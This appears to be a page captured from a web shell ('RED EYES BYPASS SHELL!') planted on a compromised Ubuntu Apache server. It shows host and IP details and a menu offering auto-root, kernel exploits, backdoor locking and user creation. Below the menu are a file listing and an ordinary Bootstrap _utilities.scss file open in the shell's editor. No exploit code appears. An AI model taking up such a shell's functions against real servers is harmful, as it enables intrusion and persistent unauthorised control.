Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
pdpa /
src /
scss /
bootstrap /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
forms
[ DIR ]
drwxr-xr-x
helpers
[ DIR ]
drwxr-xr-x
mixins
[ DIR ]
drwxr-xr-x
utilities
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
_accordion.scss
2.58
KB
-rwxr-xr-x
_alert.scss
1.44
KB
-rwxr-xr-x
_badge.scss
624
B
-rwxr-xr-x
_breadcrumb.scss
931
B
-rwxr-xr-x
_button-group.scss
2.91
KB
-rwxr-xr-x
_buttons.scss
2.22
KB
-rwxr-xr-x
_card.scss
4.69
KB
-rwxr-xr-x
_carousel.scss
5.53
KB
-rwxr-xr-x
_close.scss
1.1
KB
-rwxr-xr-x
_containers.scss
1.17
KB
-rwxr-xr-x
_dropdown.scss
5.37
KB
-rwxr-xr-x
_forms.scss
256
B
-rwxr-xr-x
_functions.scss
10.91
KB
-rwxr-xr-x
_grid.scss
601
B
-rwxr-xr-x
_helpers.scss
266
B
-rwxr-xr-x
_images.scss
1.13
KB
-rwxr-xr-x
_list-group.scss
4.46
KB
-rwxr-xr-x
_mixins.scss
899
B
-rwxr-xr-x
_modal.scss
5.55
KB
-rwxr-xr-x
_nav.scss
2.6
KB
-rwxr-xr-x
_navbar.scss
7.35
KB
-rwxr-xr-x
_offcanvas.scss
1.91
KB
-rwxr-xr-x
_pagination.scss
1.69
KB
-rwxr-xr-x
_placeholders.scss
881
B
-rwxr-xr-x
_popover.scss
4.36
KB
-rwxr-xr-x
_progress.scss
1.15
KB
-rwxr-xr-x
_reboot.scss
12.26
KB
-rwxr-xr-x
_root.scss
1.84
KB
-rwxr-xr-x
_spinners.scss
1.49
KB
-rwxr-xr-x
_tables.scss
4.11
KB
-rwxr-xr-x
_toasts.scss
1.14
KB
-rwxr-xr-x
_tooltip.scss
2.57
KB
-rwxr-xr-x
_transitions.scss
425
B
-rwxr-xr-x
_type.scss
1.31
KB
-rwxr-xr-x
_utilities.scss
15.01
KB
-rwxr-xr-x
_variables.scss
58.39
KB
-rwxr-xr-x
bootstrap-grid.scss
1.32
KB
-rwxr-xr-x
bootstrap-reboot.scss
425
B
-rwxr-xr-x
bootstrap-utilities.scss
393
B
-rwxr-xr-x
bootstrap.scss
1.04
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _utilities.scss
// stylelint-disable indentation // Utilities $utilities: () !default; // stylelint-disable-next-line scss/dollar-variable-default $utilities: map-merge( ( // scss-docs-start utils-vertical-align 'align': ( property: vertical-align, class: align, values: baseline top middle bottom text-bottom text-top, ), // scss-docs-end utils-vertical-align // scss-docs-start utils-float 'float': ( responsive: true, property: float, values: ( start: left, end: right, none: none, ), ), // scss-docs-end utils-float // Opacity utilities // scss-docs-start utils-opacity 'opacity': ( property: opacity, values: ( 0: 0, 25: 0.25, 50: 0.5, 75: 0.75, 100: 1, ), ), // scss-docs-end utils-opacity // scss-docs-start utils-overflow 'overflow': ( property: overflow, values: auto hidden visible scroll, ), // scss-docs-end utils-overflow // scss-docs-start utils-display 'display': ( responsive: true, print: true, property: display, class: d, values: inline inline-block block grid table table-row table-cell flex inline-flex none, ), // scss-docs-end utils-display // scss-docs-start utils-shadow 'shadow': ( property: box-shadow, class: shadow, values: ( null: $box-shadow, sm: $box-shadow-sm, lg: $box-shadow-lg, none: none, ), ), // scss-docs-end utils-shadow // scss-docs-start utils-position 'position': ( property: position, values: static relative absolute fixed sticky, ), 'top': ( property: top, values: $position-values, ), 'bottom': ( property: bottom, values: $position-values, ), 'start': ( property: left, class: start, values: $position-values, ), 'end': ( property: right, class: end, values: $position-values, ), 'translate-middle': ( property: transform, class: translate-middle, values: ( null: translate(-50%, -50%), x: translateX(-50%), y: translateY(-50%), ), ), // scss-docs-end utils-position // scss-docs-start utils-borders 'border': ( property: border, values: ( null: $border-width solid $border-color, 0: 0, ), ), 'border-top': ( property: border-top, values: ( null: $border-width solid $border-color, 0: 0, ), ), 'border-end': ( property: border-right, class: border-end, values: ( null: $border-width solid $border-color, 0: 0, ), ), 'border-bottom': ( property: border-bottom, values: ( null: $border-width solid $border-color, 0: 0, ), ), 'border-start': ( property: border-left, class: border-start, values: ( null: $border-width solid $border-color, 0: 0, ), ), 'border-color': ( property: border-color, class: border, values: map-merge( $theme-colors, ( 'white': $white, ) ), ), 'border-width': ( property: border-width, class: border, values: $border-widths, ), // scss-docs-end utils-borders // Sizing utilities // scss-docs-start utils-sizing 'width': ( property: width, class: w, values: ( 25: 25%, 50: 50%, 75: 75%, 100: 100%, auto: auto, ), ), 'max-width': ( property: max-width, class: mw, values: ( 100: 100%, ), ), 'viewport-width': ( property: width, class: vw, values: ( 100: 100vw, ), ), 'min-viewport-width': ( property: min-width, class: min-vw, values: ( 100: 100vw, ), ), 'height': ( property: height, class: h, values: ( 25: 25%, 50: 50%, 75: 75%, 100: 100%, auto: auto, ), ), 'max-height': ( property: max-height, class: mh, values: ( 100: 100%, ), ), 'viewport-height': ( property: height, class: vh, values: ( 100: 100vh, ), ), 'min-viewport-height': ( property: min-height, class: min-vh, values: ( 100: 100vh, ), ), // scss-docs-end utils-sizing // Flex utilities // scss-docs-start utils-flex 'flex': ( responsive: true, property: flex, values: ( fill: 1 1 auto, ), ), 'flex-direction': ( responsive: true, property: flex-direction, class: flex, values: row column row-reverse column-reverse, ), 'flex-grow': ( responsive: true, property: flex-grow, class: flex, values: ( grow-0: 0, grow-1: 1, ), ), 'flex-shrink': ( responsive: true, property: flex-shrink, class: flex, values: ( shrink-0: 0, shrink-1: 1, ), ), 'flex-wrap': ( responsive: true, property: flex-wrap, class: flex, values: wrap nowrap wrap-reverse, ), 'gap': ( responsive: true, property: gap, class: gap, values: $spacers, ), 'justify-content': ( responsive: true, property: justify-content, values: ( start: flex-start, end: flex-end, center: center, between: space-between, around: space-around, evenly: space-evenly, ), ), 'align-items': ( responsive: true, property: align-items, values: ( start: flex-start, end: flex-end, center: center, baseline: baseline, stretch: stretch, ), ), 'align-content': ( responsive: true, property: align-content, values: ( start: flex-start, end: flex-end, center: center, between: space-between, around: space-around, stretch: stretch, ), ), 'align-self': ( responsive: true, property: align-self, values: ( auto: auto, start: flex-start, end: flex-end, center: center, baseline: baseline, stretch: stretch, ), ), 'order': ( responsive: true, property: order, values: ( first: -1, 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, last: 6, ), ), // scss-docs-end utils-flex // Margin utilities // scss-docs-start utils-spacing 'margin': ( responsive: true, property: margin, class: m, values: map-merge( $spacers, ( auto: auto, ) ), ), 'margin-x': ( responsive: true, property: margin-right margin-left, class: mx, values: map-merge( $spacers, ( auto: auto, ) ), ), 'margin-y': ( responsive: true, property: margin-top margin-bottom, class: my, values: map-merge( $spacers, ( auto: auto, ) ), ), 'margin-top': ( responsive: true, property: margin-top, class: mt, values: map-merge( $spacers, ( auto: auto, ) ), ), 'margin-end': ( responsive: true, property: margin-right, class: me, values: map-merge( $spacers, ( auto: auto, ) ), ), 'margin-bottom': ( responsive: true, property: margin-bottom, class: mb, values: map-merge( $spacers, ( auto: auto, ) ), ), 'margin-start': ( responsive: true, property: margin-left, class: ms, values: map-merge( $spacers, ( auto: auto, ) ), ), // Negative margin utilities 'negative-margin': ( responsive: true, property: margin, class: m, values: $negative-spacers, ), 'negative-margin-x': ( responsive: true, property: margin-right margin-left, class: mx, values: $negative-spacers, ), 'negative-margin-y': ( responsive: true, property: margin-top margin-bottom, class: my, values: $negative-spacers, ), 'negative-margin-top': ( responsive: true, property: margin-top, class: mt, values: $negative-spacers, ), 'negative-margin-end': ( responsive: true, property: margin-right, class: me, values: $negative-spacers, ), 'negative-margin-bottom': ( responsive: true, property: margin-bottom, class: mb, values: $negative-spacers, ), 'negative-margin-start': ( responsive: true, property: margin-left, class: ms, values: $negative-spacers, ), // Padding utilities 'padding': ( responsive: true, property: padding, class: p, values: $spacers, ), 'padding-x': ( responsive: true, property: padding-right padding-left, class: px, values: $spacers, ), 'padding-y': ( responsive: true, property: padding-top padding-bottom, class: py, values: $spacers, ), 'padding-top': ( responsive: true, property: padding-top, class: pt, values: $spacers, ), 'padding-end': ( responsive: true, property: padding-right, class: pe, values: $spacers, ), 'padding-bottom': ( responsive: true, property: padding-bottom, class: pb, values: $spacers, ), 'padding-start': ( responsive: true, property: padding-left, class: ps, values: $spacers, ), // scss-docs-end utils-spacing // Text // scss-docs-start utils-text 'font-family': ( property: font-family, class: font, values: ( monospace: var(--#{$variable-prefix}font-monospace), ), ), 'font-size': ( rfs: true, property: font-size, class: fs, values: $font-sizes, ), 'font-style': ( property: font-style, class: fst, values: italic normal, ), 'font-weight': ( property: font-weight, class: fw, values: ( light: $font-weight-light, lighter: $font-weight-lighter, normal: $font-weight-normal, bold: $font-weight-bold, bolder: $font-weight-bolder, ), ), 'line-height': ( property: line-height, class: lh, values: ( 1: 1, sm: $line-height-sm, base: $line-height-base, lg: $line-height-lg, ), ), 'text-align': ( responsive: true, property: text-align, class: text, values: ( start: left, end: right, center: center, ), ), 'text-decoration': ( property: text-decoration, values: none underline line-through, ), 'text-transform': ( property: text-transform, class: text, values: lowercase uppercase capitalize, ), 'white-space': ( property: white-space, class: text, values: ( wrap: normal, nowrap: nowrap, ), ), 'word-wrap': ( property: word-wrap word-break, class: text, values: ( break: break-word, ), rtl: false, ), // scss-docs-end utils-text // scss-docs-start utils-color 'color': ( property: color, class: text, local-vars: ( 'text-opacity': 1, ), values: map-merge( $utilities-text-colors, ( 'muted': $text-muted, 'black-50': rgba($black, 0.5), // deprecated 'white-50': rgba($white, 0.5), // deprecated 'reset': inherit, ) ), ), 'text-opacity': ( css-var: true, class: text-opacity, values: ( 25: 0.25, 50: 0.5, 75: 0.75, 100: 1, ), ), // scss-docs-end utils-color // scss-docs-start utils-bg-color 'background-color': ( property: background-color, class: bg, local-vars: ( 'bg-opacity': 1, ), values: map-merge( $utilities-bg-colors, ( 'transparent': transparent, ) ), ), 'bg-opacity': ( css-var: true, class: bg-opacity, values: ( 10: 0.1, 25: 0.25, 50: 0.5, 75: 0.75, 100: 1, ), ), // scss-docs-end utils-bg-color 'gradient': ( property: background-image, class: bg, values: ( gradient: var(--#{$variable-prefix}gradient), ), ), // scss-docs-start utils-interaction 'user-select': ( property: user-select, values: all auto none, ), 'pointer-events': ( property: pointer-events, class: pe, values: none auto, ), // scss-docs-end utils-interaction // scss-docs-start utils-border-radius 'rounded': ( property: border-radius, class: rounded, values: ( null: $border-radius, 0: 0, 1: $border-radius-sm, 2: $border-radius, 3: $border-radius-lg, circle: 50%, pill: $border-radius-pill, ), ), 'rounded-top': ( property: border-top-left-radius border-top-right-radius, class: rounded-top, values: ( null: $border-radius, ), ), 'rounded-end': ( property: border-top-right-radius border-bottom-right-radius, class: rounded-end, values: ( null: $border-radius, ), ), 'rounded-bottom': ( property: border-bottom-right-radius border-bottom-left-radius, class: rounded-bottom, values: ( null: $border-radius, ), ), 'rounded-start': ( property: border-bottom-left-radius border-top-left-radius, class: rounded-start, values: ( null: $border-radius, ), ), // scss-docs-end utils-border-radius // scss-docs-start utils-visibility 'visibility': ( property: visibility, class: null, values: ( visible: visible, invisible: hidden, ), ) // scss-docs-end utils-visibility ), $utilities );
Close